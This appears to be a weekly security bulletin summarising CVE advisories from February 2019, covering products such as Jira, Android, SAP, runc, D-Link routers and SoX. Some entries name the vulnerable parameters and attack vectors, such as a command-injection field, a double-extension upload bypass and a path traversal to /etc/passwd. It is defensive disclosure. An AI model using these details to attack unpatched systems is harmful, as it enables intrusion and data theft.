atlassian — jira The two-dimensional filter statistics gadget in Atlassian Jira before version 7.6.10, from version 7.7.0 before version 7.12.4, and from version 7.13.0 before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the name of a saved filter when displayed on a Jira dashboard. 2019-02-13 3.5 CVE-2018-13403
CONFIRM
atlassian — jira The labels widget gadget in Atlassian Jira before version 7.6.11 and from version 7.7.0 before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the rendering of retrieved content from a url location that could be manipulated by the up_projectid widget preference setting. 2019-02-13 3.5 CVE-2018-20232
BID
CONFIRM
cisco — identity_services_engine A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based interface. The vulnerability is due to insufficient input validation of some parameters passed to the web-based management interface. An attacker could exploit this vulnerability by convincing a user of the interface to click a specific link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information. For information about fixed software releases, consult the Cisco bug ID at https://quickview.cloudapps.cisco.com/quickview/bug/CSCvn64652. When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories and Alerts page, to determine exposure and a complete upgrade solution. 2019-02-08 3.5 CVE-2019-1673
BID
CISCO
frog_cms_project — frog_cms Frog CMS 0.9.5 has XSS via the admin/?/layout/edit/1 Body field. 2019-02-10 3.5 CVE-2018-20774
MISC
frog_cms_project — frog_cms Frog CMS 0.9.5 has XSS via the admin/?/snippet/edit/1 Body field. 2019-02-10 3.5 CVE-2018-20777
MISC
google — android In all android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Users with no extra privileges can potentially access leaked data due to uninitialized padding present in a display function. 2019-02-11 2.1 CVE-2018-12006
CONFIRM
google — android In all android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Uninitialized data for socket address leads to information exposure. 2019-02-11 2.1 CVE-2018-12011
CONFIRM
google — android In avdt_scb_hdl_report of avdt_scb_act.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-111450156. 2019-02-11 3.3 CVE-2018-9588
BID
CONFIRM
google — android In ieee802_11_rx_wnmsleep_req of wnm_ap.c in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure in the wifi driver with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-111893132. 2019-02-11 2.1 CVE-2018-9589
BID
CONFIRM
google — android In llcp_dlc_proc_i_pdu of llcp_dlc.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure over NFC with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116722267. 2019-02-11 3.3 CVE-2018-9593
BID
CONFIRM
google — android In llcp_link_proc_agf_pdu of llcp_link.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure over NFC with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116791157. 2019-02-11 3.3 CVE-2018-9594
BID
CONFIRM
mcafee — true_key Data Leakage Attacks vulnerability in Microsoft Windows client in McAfee True Key (TK) 3.1.9211.0 and earlier allows local users to expose confidential data via specially crafted malware. 2019-02-13 2.1 CVE-2019-3610
CONFIRM
omron — cx-supervisor When CX-Supervisor (Versions 3.42 and prior) processes project files, an attacker who tampers with the value of an offset can force the application to read a value outside of an array. 2019-02-12 3.5 CVE-2018-19020
MISC
sap — business_one Under certain conditions SAP Business One Mobile Android App, version 1.2.12, allows an attacker to access information which would otherwise be restricted. 2019-02-15 2.1 CVE-2019-0256
BID
MISC
MISC
tenable — nessus Nessus versions 8.2.1 and earlier were found to contain a stored XSS vulnerability due to improper validation of user-supplied input. An authenticated, remote attacker could potentially exploit this vulnerability via a specially crafted request to execute arbitrary script code in a user’s browser session. Tenable has released Nessus 8.2.2 to address this issue. 2019-02-11 3.5 CVE-2019-3923
CONFIRM

Severity Not Yet Assigned

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
advancecomp — advancecomp An issue was discovered in AdvanceCOMP before 2.1. An invalid memory address occurs in the function adv_png_unfilter_8 in png.c. It can be triggered by sending a crafted file to a binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact when a victim opens a specially crafted file. 2019-02-16 not yet calculated CVE-2019-8383
MISC
MISC
advancecomp — advancecomp An issue was discovered in AdvanceCOMP before 2.1. A NULL pointer dereference exists in the function be_uint32_read() located in endianrw.h. It can be triggered by sending a crafted file to a binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact when a victim opens a specially crafted file. 2019-02-16 not yet calculated CVE-2019-8379
MISC
MISC
amazon — fire_os Amazon Fire OS before 5.3.6.4 allows a man-in-the-middle attack against HTTP requests for “Terms of Use” and Privacy pages. 2019-02-16 not yet calculated CVE-2019-7399
BID
MISC
atlassian — jira The VerifyPopServerConnection resource in Atlassian Jira before version 7.6.10, from version 7.7.0 before version 7.7.5, from version 7.8.0 before version 7.8.5, from version 7.9.0 before version 7.9.3, from version 7.10.0 before version 7.10.3, from version 7.11.0 before version 7.11.3, from version 7.12.0 before version 7.12.3, and from version 7.13.0 before version 7.13.1 allows remote attackers who have administrator rights to determine the existence of internal hosts & open ports and in some cases obtain service information from internal network resources via a Server Side Request Forgery (SSRF) vulnerability. 2019-02-13 not yet calculated CVE-2018-13404
CONFIRM
bento4 — bento4 An issue was discovered in Bento4 1.5.1-628. A NULL pointer dereference occurs in the function AP4_List:Find located in Core/Ap4List.h when called from Core/Ap4Movie.cpp. It can be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8382
MISC
MISC
bento4 — bento4 An issue was discovered in Bento4 1.5.1-628. A NULL pointer dereference occurs in AP4_Track::GetSampleIndexForTimeStampMs() located in Core/Ap4Track.cpp. It can be triggered by sending a crafted file to the mp4audioclip binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8380
MISC
MISC
bento4 — bento4 An issue was discovered in Bento4 1.5.1-628. A heap-based buffer over-read exists in AP4_BitStream::ReadBytes() in Codecs/Ap4BitStream.cpp, a similar issue to CVE-2017-14645. It can be triggered by sending a crafted file to the aac2mp4 binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8378
MISC
MISC
bitcoin — bitcoin_core_and_bitcoin_knots Bitcoin Core 0.12.0 through 0.17.1 and Bitcoin Knots 0.12.0 through 0.17.x before 0.17.1.knots20181229 have Incorrect Access Control. Local users can exploit this to steal currency by binding the RPC IPv4 localhost port, and forwarding requests to the IPv6 localhost port. 2019-02-11 not yet calculated CVE-2018-20587
MISC
MISC
c.p.sub_project — c.p.sub C.P.Sub before 5.3 allows CSRF via a manage.php?p=article_del&id= URI. 2019-02-11 not yet calculated CVE-2019-7738
MISC
MISC
cisco — meeting_server A vulnerability in the Session Initiation Protocol (SIP) call processing of Cisco Meeting Server (CMS) software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition of the Cisco Meeting Server. The vulnerability is due to insufficient validation of Session Description Protocol (SDP) messages. An attacker could exploit this vulnerability by sending a crafted SDP message to the CMS call bridge. An exploit could allow the attacker to cause the CMS to reload, causing a DoS condition for all connected clients. Versions prior to 2.3.9 are affected. 2019-02-08 not yet calculated CVE-2019-1676
BID
CISCO
cisco — network_assurance_engine A vulnerability in the management web interface of Cisco Network Assurance Engine (NAE) could allow an unauthenticated, local attacker to gain unauthorized access or cause a Denial of Service (DoS) condition on the server. The vulnerability is due to a fault in the password management system of NAE. An attacker could exploit this vulnerability by authenticating with the default administrator password via the CLI of an affected server. A successful exploit could allow the attacker to view potentially sensitive information or bring the server down, causing a DoS condition. This vulnerability affects Cisco Network Assurance Engine (NAE) Release 3.0(1). The default password condition only affects new installations of Release 3.0(1). 2019-02-12 not yet calculated CVE-2019-1688
BID
CISCO
cloud_foundry — credhub_cli Cloud Foundry CredHub CLI, versions prior to 2.2.1, inadvertently writes authentication credentials provided via environment variables to its persistent config file. A local authenticated malicious user with access to the CredHub CLI config file can use these credentials to retrieve and modify credentials stored in CredHub that are authorized to the targeted user. 2019-02-13 not yet calculated CVE-2019-3782
BID
CONFIRM
d-circle — power_egg Input validation issue in POWER EGG(Ver 2.0.1, Ver 2.02 Patch 3 and earlier, Ver 2.1 Patch 4 and earlier, Ver 2.2 Patch 7 and earlier, Ver 2.3 Patch 9 and earlier, Ver 2.4 Patch 13 and earlier, Ver 2.5 Patch 12 and earlier, Ver 2.6 Patch 8 and earlier, Ver 2.7 Patch 6 and earlier, Ver 2.7 Government Edition Patch 7 and earlier, Ver 2.8 Patch 6 and earlier, Ver 2.8c Patch 5 and earlier, Ver 2.9 Patch 4 and earlier) allows remote attackers to execute EL expression on the server via unspecified vectors. 2019-02-13 not yet calculated CVE-2019-5916
JVN
MISC
d-link — dir-823g_devices An issue was discovered on D-Link DIR-823G devices with firmware 1.02B03. There is incorrect access control allowing remote attackers to enable Guest Wi-Fi via the SetWLanRadioSettings HNAP API to the web service provided by /bin/goahead. 2019-02-16 not yet calculated CVE-2019-8392
MISC
d-link — dir-878_devices An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the system function with untrusted input from the request body for the SetStaticRouteIPv6Settings API function, as demonstrated by shell metacharacters in the DestNetwork field. 2019-02-12 not yet calculated CVE-2019-8317
MISC
dedecms — dedecms DedeCMS through V5.7SP2 allows arbitrary file upload in dede/album_edit.php or dede/album_add.php, as demonstrated by a dede/album_edit.php?dopost=save&formzip=1 request with a ZIP archive that contains a file such as “1.jpg.php” (because input validation only checks that .jpg, .png, or .gif is present as a substring, and does not otherwise check the file name or content). 2019-02-16 not yet calculated CVE-2019-8362
MISC
dell — wyse_password_encoder The Dell Wyse Password Encoder in ThinLinux2 versions prior to 2.1.0.01 contains a Hard-coded Cryptographic Key vulnerability. An unauthenticated remote attacker could reverse engineer the cryptographic system used in the Dell Wyse Password Encoder to discover the hard coded private key and decrypt locally stored cipher text. 2019-02-13 not yet calculated CVE-2018-15781
MISC
django — django Django 1.11.x before 1.11.19, 2.0.x before 2.0.11, and 2.1.x before 2.1.6 allows Uncontrolled Memory Consumption via a malicious attacker-supplied value to the django.utils.numberformat.format() function. 2019-02-11 not yet calculated CVE-2019-6975
BID
MISC
MISC
UBUNTU
MISC
MISC
dundas_data_visualization — dundas_bi The Dundas BI server before 5.0.1.1010 is vulnerable to a Server-Side Request Forgery attack, allowing an attacker to forge arbitrary requests (with certain restrictions) that will be executed on behalf of the attacker, via the viewUrl parameter of the “export the dashboard as an image” feature. This could be leveraged to provide a proxy to attack other servers (internal or external) or to perform network scans of external or internal networks. 2019-02-11 not yet calculated CVE-2018-18569
MISC
eclipse — openj9 In Eclipse OpenJ9, prior to the 0.12.0 release, the jio_snprintf() and jio_vsnprintf() native methods ignored the length parameter. This allows existing APIs that called the functions to exceed the allocated buffer. These functions were not directly callable by non-native user code. 2019-02-11 not yet calculated CVE-2018-12547
CONFIRM
eclipse — openj9 In Eclipse OpenJ9 version 0.11.0, the OpenJ9 JIT compiler may incorrectly omit a null check on the receiver object of an Unsafe call when accelerating it. 2019-02-11 not yet calculated CVE-2018-12549
CONFIRM
enphase_energy — envoy XSS exists in Enphase Envoy R3.*.* via the profileName parameter to the /home URI on TCP port 8888. 2019-02-09 not yet calculated CVE-2019-7677
MISC
MISC
enphase_energy — envoy A directory traversal vulnerability was discovered in Enphase Envoy R3.*.* via images/, include/, include/js, or include/css on TCP port 8888. 2019-02-09 not yet calculated CVE-2019-7678
MISC
MISC
flatpak — flatpak Flatpak before 1.0.7, and 1.1.x and 1.2.x before 1.2.3, exposes /proc in the apply_extra script sandbox, which allows attackers to modify a host-side executable file. 2019-02-12 not yet calculated CVE-2019-8308
MISC
MISC
MISC
freebsd — freebsd In FreeBSD 11.2-STABLE after r338618 and before r343786, 12.0-STABLE before r343781, and 12.0-RELEASE before 12.0-RELEASE-p3, a bug in the reference count implementation for UNIX domain sockets can cause a file structure to be incorrectly released potentially allowing a malicious local user to gain root privileges or escape from a jail. 2019-02-12 not yet calculated CVE-2019-5596
FREEBSD
freebsd — freebsd In FreeBSD before 11.2-STABLE(r343782), 11.2-RELEASE-p9, 12.0-STABLE(r343781), and 12.0-RELEASE-p3, kernel callee-save registers are not properly sanitized before return from system calls, potentially allowing some kernel data used in the system call to be exposed. 2019-02-12 not yet calculated CVE-2019-5595
FREEBSD
genivia — gsoap Genivia gSOAP 2.7.x and 2.8.x before 2.8.75 allows attackers to cause a denial of service (application abort) or possibly have unspecified other impact if a server application is built with the -DWITH_COOKIES flag. This affects the C/C++ libgsoapck/libgsoapck++ and libgsoapssl/libgsoapssl++ libraries, as these are built with that flag. 2019-02-09 not yet calculated CVE-2019-7659
CONFIRM
gnome — keyring In pam/gkr-pam-module.c in GNOME Keyring before 3.27.2, the user’s password is kept in a session-child process spawned from the LightDM daemon. This can expose the credential in cleartext. 2019-02-12 not yet calculated CVE-2018-20781
MISC
MISC
MISC
MISC
hgiga — oaklouds_mailsherlock A SQL Injection in MailSherlock before 1.5.235 for OAKlouds allows an unauthenticated user to extract the subjects of the emails of other users within the enterprise via the select_mid parameter in a letgo.cgi request. 2019-02-11 not yet calculated CVE-2018-17542
CONFIRM
CONFIRM
hiawatha — hiawatha In Hiawatha before 10.8.4, a remote attacker is able to do directory traversal if AllowDotFiles is enabled. 2019-02-16 not yet calculated CVE-2019-8358
CONFIRM
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 134177. 2019-02-15 not yet calculated CVE-2017-1695
XF
CONFIRM
ibm — infosphere_information_server IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 152159. 2019-02-15 not yet calculated CVE-2018-1895
CONFIRM
XF
ibm — infosphere_information_server IBM InfoSphere Information Server 11.7 could allow an authenticated user under specialized conditions to inject commands into the installation process that would execute on the WebSphere Application Server. IBM X-Force ID: 145970. 2019-02-15 not yet calculated CVE-2018-1701
XF
CONFIRM
ibm — infosphere_information_server IBM InfoSphere Information Server 9.1, 11.3, 11.5, and 11.7 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 147630. 2019-02-15 not yet calculated CVE-2018-1727
XF
CONFIRM
ibm — rational_clearcase IBM Rational ClearCase 1.0.0.0 GIT connector does not sufficiently protect the document database password. An attacker could obtain the password and gain unauthorized access to the document database. IBM X-Force ID: 156583. 2019-02-15 not yet calculated CVE-2019-4059
XF
CONFIRM
jforum — jforum In JForum 2.1.8, an unauthenticated, remote attacker can enumerate whether a user exists by using the “create user” function. If a register/check/username?username= request corresponds to a username that exists, then an “is already in use” error is produced. NOTE: this product is discontinued. 2019-02-12 not yet calculated CVE-2019-7550
MISC
kunbus — pr100088_modbus_gateway An attacker could retrieve plain-text credentials stored in a XML file on PR100088 Modbus gateway versions prior to Release R02 (or Software Version 1.1.13166) through FTP. 2019-02-12 not yet calculated CVE-2019-6549
MISC
kunbus — pr100088_modbus_gateway Registers used to store Modbus values can be read and written from the web interface without authentication in the PR100088 Modbus gateway versions prior to Release R02 (or Software Version 1.1.13166). 2019-02-12 not yet calculated CVE-2019-6533
MISC
kunbus — pr100088_modbus_gateway PR100088 Modbus gateway versions prior to Release R02 (or Software Version 1.1.13166) may allow an attacker to be able to change the password for an admin user who is currently or previously logged in, provided the device has not been restarted. 2019-02-12 not yet calculated CVE-2019-6527
MISC
mailmate — mailmate MailMate before 1.11.3 mishandles a suspicious HTML/MIME structure in a signed/encrypted email. 2019-02-11 not yet calculated CVE-2018-15588
MISC
mambo — cms Mambo CMS v4.6.5 discloses the root path of the webserver via the scripts thumbs.php, editorFrame.php, editor.php, images.php, and manager.php. 2019-02-15 not yet calculated CVE-2013-2565
MISC
MISC
micco — lhmelting Untrusted search path vulnerability in the installer of LHMelting (LHMelting for Win32 Ver 1.65.3.6 and earlier) allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2019-5913
JVN
MISC
micco — unarj32.dll Untrusted search path vulnerability in the installer of UNARJ32.DLL (UNARJ32.DLL for Win32 Ver 1.10.1.25 and earlier) allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2019-5912
JVN
MISC
micco — unlha32.dll Untrusted search path vulnerability in the installer of UNLHA32.DLL (UNLHA32.DLL for Win32 Ver 2.67.1.2 and earlier) allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2019-5911
JVN
MISC
micco — unlha32.dll Untrusted search path vulnerability in Self-Extracting Archives created by UNLHA32.DLL prior to Ver 3.00 allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2018-16189
JVN
MISC
micco — unlha32.dll_and_unarj32.dll_and_lhmelting_and_lmlzh32.dll Untrusted search path vulnerability in UNARJ32.DLL for Win32, LHMelting for Win32, and LMLzh32.DLL (UNARJ32.DLL for Win32 Ver 1.10.1.25 and earlier, LHMelting for Win32 Ver 1.65.3.6 and earlier, LMLzh32.DLL Ver 2.67.1.2 and earlier) allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2018-16190
JVN
MISC
MISC
MISC
MISC
micro_focus — solutions_business_manager An Authentication Bypass issue exists in Solutions Business Manager (SBM) (formerly Serena Business Manager (SBM)) versions prior to 11.5. 2019-02-12 not yet calculated CVE-2018-19645
CONFIRM
msmtp — msmtp In msmtp 1.8.2, when tls_trust_file has its default configuration, certificate-verification results are not properly checked. 2019-02-13 not yet calculated CVE-2019-8337
CONFIRM
multiple_vendors — runc runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe. 2019-02-11 not yet calculated CVE-2019-5736
BID
REDHAT
REDHAT
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
EXPLOIT-DB
EXPLOIT-DB
MISC
MISC
musicloud — musicloud A file-read vulnerability was identified in the Wi-Fi transfer feature of Musicloud 1.6. By default, the application runs a transfer service on port 8080, accessible by everyone on the same Wi-Fi network. An attacker can send the POST parameters downfiles and cur-folder (with a crafted ../ payload) to the download.script endpoint. This will create a MusicPlayerArchive.zip archive that is publicly accessible and includes the content of any requested file (such as the /etc/passwd file). 2019-02-16 not yet calculated CVE-2019-8389
MISC
open_source_solution_technology_corporation — openam Open redirect vulnerability in OpenAM (Open Source Edition) 13.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a specially crafted page. 2019-02-13 not yet calculated CVE-2019-5915
JVN
MISC
MISC
open_source_solution_technology_corporation — openam OpenAM (Open Source Edition) 13.0 and later does not properly manage sessions, which allows remote authenticated attackers to change the security questions and reset the login password via unspecified vectors. 2019-02-13 not yet calculated CVE-2018-0696
JVN
MISC
MISC
phpscriptsmall.com — responsive_video_news_script PHP Scripts Mall Responsive Video News Script has XSS via the Search Bar. This might, for example, be leveraged for HTML injection or URL redirection. 2019-02-16 not yet calculated CVE-2019-8361
MISC
MISC
pmd — pmd PMD 5.8.1 and earlier processes XML external entities in ruleset files it parses as part of the analysis process, allowing attackers who tamper with those files (either by direct modification or MITM attacks when using remote rulesets) to perform information disclosure, denial of service, or request forgery attacks. (PMD 6.x is unaffected because of a 2017-09-15 change.) 2019-02-11 not yet calculated CVE-2019-7722
MISC
qualcomm — snapdragon If an end user makes use of SCP11 sample OCE code without modification it could lead to a buffer overflow when transmitting a CAPDU in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT and Snapdragon Mobile in versions MDM9607, MDM9650, MDM9655, MSM8996AU, SD 210/SD 212/SD 205, SD 410/12, SD 636, SD 820, SD 820A, SD 835, SD 8CX, SDA660, SDM630, SDM660. 2019-02-11 not yet calculated CVE-2018-11855
CONFIRM
qualcomm — snapdragon A malicious TA can tag QSEE kernel memory and map it to EL0, thereby corrupting the physical memory; it can also be used to corrupt the QSEE kernel and compromise the whole TEE in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables and Snapdragon Wired Infrastructure and Networking in versions IPQ8074, MDM9206, MDM9607, MDM9650, MDM9655, MSM8909W, MSM8996AU, QCA8081, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 650/52, SD 820, SD 820A, SD 835, SD 8CX, SDM439 and Snapdragon_High_Med_2016. 2019-02-11 not yet calculated CVE-2018-11847
BID
CONFIRM
rubygems — fileutils Ruby Gem FileUtils <= v0.7 has a Command Injection vulnerability in a user-supplied url variable that is passed to the shell. 2019-02-15 not yet calculated CVE-2013-2516
MISC
MISC
sap — abap_platform SLD Registration of ABAP Platform allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service. Fixed in versions KRNL32NUC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL64NUC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, KRNL64UC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.73, KERNEL from 7.21 to 7.22, 7.45, 7.49, 7.53, 7.73, 7.75. 2019-02-15 not yet calculated CVE-2019-0265
BID
MISC
MISC
sap — businessobjects SAP BusinessObjects, versions 4.2 and 4.3, (Visual Difference) allows an attacker to upload any file (including script files) without proper file format validation. 2019-02-15 not yet calculated CVE-2019-0259
BID
MISC
MISC
sap — disclosure_management SAP Disclosure Management, version 10.01, does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. 2019-02-15 not yet calculated CVE-2019-0258
BID
MISC
MISC
sap — disclosure_management SAP Disclosure Management (before version 10.1 Stack 1301) does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability. 2019-02-15 not yet calculated CVE-2019-0254
BID
MISC
MISC
sap — fiori_launchpad The Fiori Launchpad of SAP BusinessObjects, before versions 4.2 and 4.3, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability. 2019-02-15 not yet calculated CVE-2019-0251
BID
MISC
MISC
sap — hana_extended_application_services Under certain conditions SAP HANA Extended Application Services, version 1.0, advanced model (XS advanced) writes credentials of platform users to a trace file of the SAP HANA system. Even though this trace file is protected from unauthorized access, the risk of leaking information is increased. 2019-02-15 not yet calculated CVE-2019-0266
BID
MISC
MISC
sap — hana_extended_application_services Under certain circumstances, SAP HANA Extended Application Services, advanced model (XS advanced) does not perform authentication checks properly for XS advanced platform and business users. Fixed in 1.0.97 to 1.0.99 (running on SAP HANA 1 or SAP HANA 2 SPS0 (second S stands for stack)). 2019-02-15 not yet calculated CVE-2019-0261
BID
MISC
MISC
sap — manufacturing_integration_and_intelligence SAP Manufacturing Integration and Intelligence, versions 15.0, 15.1 and 15.2, (Illuminator Servlet) currently does not provide Anti-XSRF tokens. This might lead to XSRF attacks in case the data is being posted to the Servlet from an external application. 2019-02-15 not yet calculated CVE-2019-0267
BID
MISC
MISC
sap — netweaver_as_abap_platform Customizing functionality of SAP NetWeaver AS ABAP Platform (fixed in versions from 7.0 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.53, from 7.74 to 7.75) does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. 2019-02-15 not yet calculated CVE-2019-0257
BID
MISC
MISC
sap — netweaver_as_abap_platform SAP NetWeaver AS ABAP Platform, Krnl64nuc 7.74, krnl64UC 7.73, 7.74, Kernel 7.73, 7.74, 7.75, fails to validate the type of installation for an ABAP Server system correctly. That behavior may lead to a situation where a business user gains access to the full SAP Menu, that is, the ‘Easy Access Menu’. Any user can misuse this situation to escalate privileges to business functionality. 2019-02-15 not yet calculated CVE-2019-0255
BID
MISC
MISC
sap — webintelligence_bilaunchpad
 
SAP WebIntelligence BILaunchPad, versions 4.10, 4.20, does not sufficiently encode user-controlled inputs in generated HTML reports, resulting in Cross-Site Scripting (XSS) vulnerability. 2019-02-15 not yet calculated CVE-2019-0262
BID
MISC
MISC
sound_exchange_project — sound_exchange An issue was discovered in SoX 14.4.2. lsx_make_lpf in effect_i_dsp.c allows a NULL pointer dereference. 2019-02-15 not yet calculated CVE-2019-8357
MISC
sound_exchange_project — sound_exchange An issue was discovered in SoX 14.4.2. lsx_make_lpf in effect_i_dsp.c has an integer overflow on the result of multiplication fed into malloc. When the buffer is allocated, it is smaller than expected, leading to a heap-based buffer overflow. 2019-02-15 not yet calculated CVE-2019-8354
MISC
sound_exchange_project — sound_exchange An issue was discovered in SoX 14.4.2. One of the arguments to bitrv2 in fft4g.c is not guarded, such that it can lead to write access outside of the statically declared array, aka a stack-based buffer overflow. 2019-02-15 not yet calculated CVE-2019-8356
MISC
sound_exchange_project — sound_exchange An issue was discovered in SoX 14.4.2. In xmalloc.h, there is an integer overflow on the result of multiplication fed into the lsx_valloc macro that wraps malloc. When the buffer is allocated, it is smaller than expected, leading to a heap-based buffer overflow in channels_start in remix.c. 2019-02-15 not yet calculated CVE-2019-8355
MISC
tcpcrypt — boks
 
A buffer overflow exists in HelpSystems tcpcrypt on Linux, used for BoKS encrypted telnet through BoKS version 6.7.1. Since tcpcrypt is setuid, exploitation leads to privilege escalation. 2019-02-08 not yet calculated CVE-2018-20764
CONFIRM
tcpreplay — tcpreplay An issue was discovered in Tcpreplay 4.3.1. An invalid memory access occurs in do_checksum in checksum.c. It can be triggered by sending a crafted pcap file to the tcpreplay-edit binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8381
MISC
MISC
tcpreplay — tcpreplay An issue was discovered in Tcpreplay 4.3.1. A NULL pointer dereference occurred in the function get_ipv6_l4proto() located at get.c. This can be triggered by sending a crafted pcap file to the tcpreplay-edit binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8377
MISC
MISC
tcpreplay — tcpreplay
 
An issue was discovered in Tcpreplay 4.3.1. A NULL pointer dereference occurred in the function get_layer4_v6() located at get.c. This can be triggered by sending a crafted pcap file to the tcpreplay-edit binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8376
MISC
MISC
themerig — find_a_place_cms_directory Themerig Find a Place CMS Directory 1.5 has SQL Injection via the find/assets/external/data_2.php cate parameter. 2019-02-16 not yet calculated CVE-2019-8360
MISC
tibco — silver_fabric
 
The SOAP Admin API component of TIBCO Software Inc.’s TIBCO Silver Fabric contains a vulnerability that may allow reflected cross-site scripting (XSS) attacks. Affected releases are TIBCO Software Inc.’s TIBCO Silver Fabric: versions up to and including 5.8.1. 2019-02-13 not yet calculated CVE-2018-12409
BID
MISC
CONFIRM
ua_parser_project — uap_core
 
An issue was discovered in regex.yaml (aka regexes.yaml) in UA-Parser UAP-Core before 0.6.0. A Regular Expression Denial of Service (ReDoS) issue allows remote attackers to overload a server by setting the User-Agent header in an HTTP(S) request to a value containing a long digit string. (The UAP-Core project contains the vulnerability, propagating to all implementations.) 2019-02-13 not yet calculated CVE-2018-20164
MISC
MISC
MISC
ubiquiti_networks — airmax_and_edgemax
 
Denial of Service attack in airMAX < 8.3.2 , airMAX < 6.0.7 and EdgeMAX < 1.9.7 allow attackers to use the Discovery Protocol in amplification attacks. 2019-02-12 not yet calculated CVE-2017-0938
MISC
MISC
MISC
verydows — verydows
 
Verydows 2.0 has XSS via the index.php?c=main a parameter, as demonstrated by an a=index[XSS] value. 2019-02-16 not yet calculated CVE-2019-8363
MISC
wecon — levistudiou Multiple stack-based buffer overflow vulnerabilities in WECON LeviStudioU version 1.8.56 and prior may be exploited when parsing strings within project files. The process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage these vulnerabilities to execute code under the context of the current process. Mat Powell, Ziad Badawi, and Natnael Samson working with Trend Micro’s Zero Day Initiative, reported these vulnerabilities to NCCIC. 2019-02-12 not yet calculated CVE-2019-6537
BID
MISC
